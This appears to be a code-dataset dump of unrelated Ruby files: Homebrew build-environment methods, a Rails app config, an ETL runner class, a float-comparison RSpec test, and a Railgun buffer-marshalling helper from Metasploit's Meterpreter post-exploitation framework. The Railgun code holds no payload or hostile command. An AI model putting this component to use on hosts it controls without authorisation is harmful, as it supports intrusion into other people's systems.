prepend_path key, path
end
# Removes the first occurrence of +value+ from each key; deletes keys
# that become empty. No-op when +value+ is falsy.
def remove(keys, value)
Array(keys).each do |key|
next unless self[key]
self[key] = self[key].sub(value, "")
delete(key) if self[key].empty?
end if value
end
def cc
self["CC"]
end
def cxx
self["CXX"]
end
def cflags
self["CFLAGS"]
end
def cxxflags
self["CXXFLAGS"]
end
def cppflags
self["CPPFLAGS"]
end
def ldflags
self["LDFLAGS"]
end
def fc
self["FC"]
end
def fflags
self["FFLAGS"]
end
def fcflags
self["FCFLAGS"]
end
# Outputs the current compiler.
# @return [Symbol]
# <pre># Do something only for clang
# if ENV.compiler == :clang
# # modify CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS in one go:
# ENV.append_to_cflags "-I ./missing/includes"
# end</pre>
# Resolution order: --cc argument, then HOMEBREW_CC, then the formula's
# compiler selector, finally the OS default. Memoized in @compiler.
def compiler
@compiler ||= if (cc = ARGV.cc)
warn_about_non_apple_gcc($&) if cc =~ GNU_GCC_REGEXP
fetch_compiler(cc, "--cc")
elsif (cc = homebrew_cc)
warn_about_non_apple_gcc($&) if cc =~ GNU_GCC_REGEXP
compiler = fetch_compiler(cc, "HOMEBREW_CC")
if @formula
compilers = [compiler] + CompilerSelector.compilers
compiler = CompilerSelector.select_for(@formula, compilers)
end
compiler
elsif @formula
CompilerSelector.select_for(@formula)
else
MacOS.default_compiler
end
end
# @private
def determine_cc
COMPILER_SYMBOL_MAP.invert.fetch(compiler, compiler)
end
# Defines one method per known compiler (e.g. ENV.clang) that switches
# the active compiler and refreshes CC/CXX.
COMPILERS.each do |compiler|
define_method(compiler) do
@compiler = compiler
self.cc = determine_cc
self.cxx = determine_cxx
end
end
# Snow Leopard defines an NCURSES value the opposite of most distros.
# See: https://bugs.python.org/issue6848
# Currently only used by aalib in core.
def ncurses_define
append "CPPFLAGS", "-DNCURSES_OPAQUE=0"
end
# @private
def userpaths!
paths = ORIGINAL_PATHS.map { |p| p.realpath.to_s rescue nil } - %w[/usr/X11/bin /opt/X11/bin]
self["PATH"] = paths.unshift(*self["PATH"].split(File::PATH_SEPARATOR)).uniq.join(File::PATH_SEPARATOR)
# XXX hot fix to prefer brewed stuff (e.g. python) over /usr/bin.
prepend_path "PATH", HOMEBREW_PREFIX/"bin"
end
# Configures a Fortran toolchain: honors a user-supplied FC, otherwise
# falls back to a discovered gfortran; optionally copies cflags into the
# Fortran flag variables.
def fortran
flags = []
if fc
ohai "Building with an alternative Fortran compiler"
puts "This is unsupported."
self["F77"] ||= fc
if ARGV.include? "--default-fortran-flags"
flags = FC_FLAG_VARS.reject { |key| self[key] }
elsif values_at(*FC_FLAG_VARS).compact.empty?
opoo <<-EOS.undent
No Fortran optimization information was provided. You may want to consider
setting FCFLAGS and FFLAGS or pass the `--default-fortran-flags` option to
`brew install` if your compiler is compatible with GCC.
If you like the default optimization level of your compiler, ignore this
warning.
EOS
end
else
if (gfortran = which("gfortran", (HOMEBREW_PREFIX/"bin").to_s))
ohai "Using Homebrew-provided fortran compiler."
elsif (gfortran = which("gfortran", ORIGINAL_PATHS.join(File::PATH_SEPARATOR)))
ohai "Using a fortran compiler found at #{gfortran}."
end
if gfortran
puts "This may be changed by setting the FC environment variable."
self["FC"] = self["F77"] = gfortran
flags = FC_FLAG_VARS
end
end
flags.each { |key| self[key] = cflags }
set_cpu_flags(flags)
end
# ld64 is a newer linker provided for Xcode 2.5
# @private
def ld64
ld64 = Formulary.factory("ld64")
self["LD"] = ld64.bin/"ld"
append "LDFLAGS", "-B#{ld64.bin}/"
end
# @private
def gcc_version_formula(name)
version = name[GNU_GCC_REGEXP, 1]
gcc_version_name = "gcc#{version.delete(".")}"
gcc = Formulary.factory("gcc")
if gcc.version_suffix == version
gcc
else
Formulary.factory(gcc_version_name)
end
end
# @private
# Raises with installation instructions when the requested Homebrew GCC
# formula is missing or not installed.
def warn_about_non_apple_gcc(name)
begin
gcc_formula = gcc_version_formula(name)
rescue FormulaUnavailableError => e
raise <<-EOS.undent
Homebrew GCC requested, but formula #{e.name} not found!
You may need to: brew tap homebrew/versions
EOS
end
unless gcc_formula.opt_prefix.exist?
raise <<-EOS.undent
The requested Homebrew GCC was not installed. You must:
brew install #{gcc_formula.full_name}
EOS
end
end
def permit_arch_flags; end
private
def cc=(val)
self["CC"] = self["OBJC"] = val.to_s
end
def cxx=(val)
self["CXX"] = self["OBJCXX"] = val.to_s
end
def homebrew_cc
self["HOMEBREW_CC"]
end
# Maps a compiler name to its symbol; GNU gcc-x.y names pass through,
# anything else is rejected with the offending source (--cc/HOMEBREW_CC).
def fetch_compiler(value, source)
COMPILER_SYMBOL_MAP.fetch(value) do |other|
case other
when GNU_GCC_REGEXP
other
else
raise "Invalid value for #{source}: #{other}"
end
end
end
end
| 24.470395 | 107 | 0.655061 |
03ea441cb4450488d6c5093eeb66acd656e134b3 | 660 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
# Application namespace; standard generated Rails application class.
module ReviewApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
end
end
| 33 | 82 | 0.765152 |
ab92eee55eff30cbea9bea83472ac6e57b93fd92 | 5,368 | require 'etl/version'
require 'etl/helpers'
require 'logger'
require 'date'
require 'time'
# Small extract-transform-load runner: each lifecycle stage
# (ensure_destination / before_etl / etl / after_etl) is configured with a
# block and later invoked, optionally iterating the etl stage over a
# start/step/stop window. Queries go through #query with timing + logging.
class ETL
include Helpers
attr_accessor :description
attr_accessor :connection
attr_reader :logger
# Stage names, in execution order for #run.
ORDERED_ETL_OPERATIONS = [
:ensure_destination,
:before_etl,
:etl,
:after_etl
]
# Window accessors; when all three are configured, #etl iterates.
ITERATOR_OPERATIONS = [
:start,
:step,
:stop
]
def self.connection= connection
@connection = connection
end
def self.connection
@connection
end
# Class-level defaults merged into every new instance's attributes.
def self.defaults
{connection: @connection}
end
def initialize attributes = {}
self.class.defaults.merge(attributes).each do |key, value|
self.send "#{key}=", value
end
default_logger! unless attributes.keys.include?(:logger)
end
# Yields self for block-style configuration; returns self for chaining.
def config &block
yield self if block_given?
self
end
def logger= logger
@logger = logger
end
# A little metaprogramming to consolidate the generation of our sql
# generating / querying methods. Note that we don't metaprogram the etl
# operation as it's a little more complex.
#
# This will produce methods of the form:
#
# def [name] *args, &block
# if block_given?
# @[name] = block
# else
# @[name].call self, *args if @[name]
# end
# end
#
# for any given variable included in the method name's array
(ORDERED_ETL_OPERATIONS - [:etl]).each do |method|
define_method method do |*args, &block|
warn_args_will_be_deprecated_for method unless args.empty?
if block
instance_variable_set("@#{method}", block)
else
instance_variable_get("@#{method}").
call(self, *args) if instance_variable_get("@#{method}")
end
end
end
# With a block: stores it as the etl stage. Without: runs the stage —
# either once, or (when start/step/stop are all configured) repeatedly
# over [start, stop] in increments of step, passing each cast window
# (current, current + step) to the block.
def etl *args, &block
warn_args_will_be_deprecated_for :etl unless args.empty?
if block_given?
@etl = block
else
if iterate?
if @etl
current = start
@etl.call self, cast(current), cast(current += step) while stop >= current
end
else
@etl.call self, *args if @etl
end
end
end
# A little more metaprogramming to consolidate the generation of
# our sql generating / querying methods.
#
# This will produce methods of the form:
#
# def [method] *args, &block
# if block
# @_[method]_block = block
# else
# # cache block's result
# if defined? @[method]
# @[method]
# else
# @[method] = @_[method]_block.call(self, *args)
# end
# end
# end
#
# for any given variable included in the method name's array
ITERATOR_OPERATIONS.each do |method|
define_method method do |*args, &block|
warn_args_will_be_deprecated_for method unless args.empty?
if block
instance_variable_set("@_#{method}_block", block)
else
if instance_variable_defined?("@#{method}")
instance_variable_get("@#{method}")
else
instance_variable_set("@#{method}",
instance_variable_get("@_#{method}_block")
.call(self, *args))
end
end
end
end
# Executes all stages in order; stages named in options[:except] are skipped.
def run options = {}
(ORDERED_ETL_OPERATIONS - [*options[:except]]).each do |method|
send method
end
end
# Runs +sql+ on the configured connection, logging start/runtime.
def query sql
time_and_log(sql: sql) do
connection.query sql
end
end
def info data = {}
logger.info data.merge(emitter: self) if logger?
end
def debug data = {}
logger.debug data.merge(emitter: self) if logger?
end
private
def warn_args_will_be_deprecated_for method
warn "DEPRECATED: passing arguments to ##{method} will be removed in an upcoming release and will raise an exception. Please remove this from your code."
end
# True only when start, step AND stop blocks have all been supplied.
def iterate?
ITERATOR_OPERATIONS.all? do |method|
instance_variable_defined?("@_#{method}_block")
end
end
def default_logger!
@logger = default_logger
end
def logger?
!!@logger
end
# STDOUT logger whose formatter renders the structured Hash messages
# emitted by #info / #debug (event_type, emitter, sql, runtime, ...).
def default_logger
::Logger.new(STDOUT).tap do |logger|
logger.formatter = proc do |severity, datetime, progname, msg|
event_details = "[#{datetime}] #{severity} #{msg[:event_type]}"
emitter_details = "\"#{msg[:emitter].description || 'no description given'}\""
emitter_details += " (object #{msg[:emitter].object_id})"
leadin = "#{event_details} for #{emitter_details}"
case msg[:event_type]
when :query_start
"#{leadin}\n#{msg[:sql]}\n"
when :query_complete
"#{leadin} runtime: #{msg[:runtime]}s\n"
else
"#{leadin}: #{msg[:message]}\n"
end
end
end
end
# Wraps a block with debug (start) / info (complete + runtime) events.
def time_and_log data = {}, &block
start_runtime = Time.now
debug data.merge(event_type: :query_start)
retval = yield
info data.merge(event_type: :query_complete,
runtime: Time.now - start_runtime)
retval
end
# NOTE: If you needed to handle more type data type casting you can add a
# case statement. If you need to be able to handle entirely different sets
# of casting depending on database engine, you can modify #cast to take a
# "type" arg and then determine which caster to route the arg through
def cast arg
case arg
when Date then arg.strftime("%Y-%m-%d")
when Time then arg.strftime("%Y-%m-%d %H:%M:%S")
else
arg
end
end
end
| 24.289593 | 157 | 0.621461 |
621635ce3e6771479cc806e7562fbab483684544 | 379 | RSpec.describe SaferFloats do
# 0.1 + 0.2 is 0.30000000000000004 in IEEE-754 doubles, so exact Float
# comparison is a bug trap; SaferFloats must raise on == and != alike.
it "raises an exception when floating point numbers are compared for equality" do
expect{
0.1 + 0.2 == 0.3
}.to raise_exception(SaferFloats::Error)
end
it "raises an exception when floating point numbers are compared for inequality" do
expect{
0.1 + 0.2 != 0.3
}.to raise_exception(SaferFloats::Error)
end
end
| 23.6875 | 85 | 0.688654 |
bfa7c982aa1e87f8acdfdaa4c3615bba6437be91 | 5,042 | # Copyright (c) 2010, [email protected]
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL [email protected] BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Railgun

#
# Helper mixin shared by the Railgun DLL-call machinery: conversion between
# Ruby strings and zero-terminated ASCII / UTF-16LE buffers, constant-name
# resolution, and assembly of the "in"/"inout" parameter heap buffers.
#
module DLLHelper

	# Returns +str+ with a single terminating NUL byte appended
	# (C-style zero-terminated ASCII string).
	def str_to_ascii_z(str)
		return str+"\x00"
	end

	# Converts a zero-terminated ASCII string to a Ruby string by truncating
	# at the first NUL byte. If no NUL is present, the input is returned
	# unchanged.
	def asciiz_to_str(asciiz)
		zero_byte_idx = asciiz.index("\x00")
		if zero_byte_idx != nil
			return asciiz[0, zero_byte_idx]
		else
			return asciiz
		end
	end

	# Converts a Ruby string to a zero-terminated WCHAR (UTF-16LE) string.
	# NOTE: each byte is widened to 16 bits, so this is only a faithful
	# conversion for single-byte (ASCII/latin-1) input.
	def str_to_uni_z(str)
		enc = str.unpack("C*").pack("v*")
		enc += "\x00\x00"
		return enc
	end

	# Converts a zero-terminated UTF-16LE string to a Ruby string.
	# NOTE(review): the trailing unpack("A*") strips trailing NULs but ALSO
	# trailing spaces, so a value legitimately ending in spaces loses them.
	# Left as-is to preserve existing behavior; confirm before changing.
	def uniz_to_str(uniz)
		uniz.unpack("v*").pack("C*").unpack("A*")[0]
	end

	# parses a number param and returns the value
	# raises an exception if the param cannot be converted to a number
	# examples:
	#   nil => 0
	#   3 => 3
	#   "MB_OK" => 0
	#   "SOME_CONSTANT | OTHER_CONSTANT" => 17
	#   "tuna" => !!!!!!!!!!Exception
	#
	# Parameter "win_consts" is a WinConstantManager
	def param_to_number(v, win_consts = @win_consts)
		if v.nil?
			return 0
		elsif v.kind_of?(Integer)
			# Integer covers the legacy Fixnum/Bignum split the original code
			# tested for: those constants were deprecated in Ruby 2.4 and
			# removed in 3.2, so referencing them raises NameError on modern
			# rubies. All integers were instances of Integer either way.
			return v # ok, it's already a number
		elsif v.kind_of?(String)
			dw = win_consts.parse(v) # might raise an exception
			if dw != nil
				return dw
			else
				raise ArgumentError, "Param #{v} (class #{v.class}) cannot be converted to a number. It's a string but matches no constants I know."
			end
		else
			raise "Param #{v} (class #{v.class}) should be a number but isn't"
		end
	end

	# Assembles the heap buffer for all parameters flowing in the given
	# +direction+ ("in" or "inout") of +function+, using the caller-supplied
	# +args+ (positionally matched to function.params).
	#
	# Returns [layout, blob]:
	# * layout - Hash mapping parameter name => BufferItem describing that
	#   parameter's index, byte offset, length and type within the blob
	# * blob   - the packed byte string holding all buffer contents,
	#   8-byte aligned per entry (required on x64, harmless on x86)
	def assemble_buffer(direction, function, args)
		layout = {} # paramName => BufferItem
		blob = ""
		function.params.each_with_index do |param_desc, param_idx|
			# we care only about buffers flowing in the requested direction
			if param_desc[2] == direction
				buffer = nil

				# Special case:
				# The user can choose to supply a Null pointer instead of a
				# buffer, in which case no space is needed in the heap blob.
				if param_desc[0][0,1] == 'P' # type is a pointer
					if args[param_idx] == nil
						next
					end
				end

				case param_desc[0] # required argument type
				when "PDWORD"
					dw = param_to_number(args[param_idx])
					buffer = [dw].pack('V')
				when "PWCHAR"
					raise "param #{param_desc[1]}: string expected" unless args[param_idx].class == String
					buffer = str_to_uni_z(args[param_idx])
				when "PCHAR"
					raise "param #{param_desc[1]}: string expected" unless args[param_idx].class == String
					buffer = str_to_ascii_z(args[param_idx])
				when "PBLOB"
					raise "param #{param_desc[1]}: please supply your BLOB as string!" unless args[param_idx].class == String
					buffer = args[param_idx]
				# other types (non-pointers) don't reference buffers
				# and don't need any treatment here
				end

				if buffer != nil
					layout[param_desc[1]] = BufferItem.new(param_idx, blob.length, buffer.length, param_desc[0])
					blob += buffer
					# sf: force 8 byte alignment to satisfy x64, wont matter on x86.
					while( blob.length % 8 != 0 )
						blob += "\x00"
					end
				end
			end
		end
		return [layout, blob]
	end

end

end; end; end; end; end; end;
| 33.838926 | 136 | 0.695954 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.